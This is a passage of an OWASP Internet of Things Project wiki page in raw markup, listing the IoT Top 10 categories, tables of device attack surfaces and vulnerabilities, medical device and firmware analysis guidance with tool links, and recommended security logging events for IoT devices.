* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
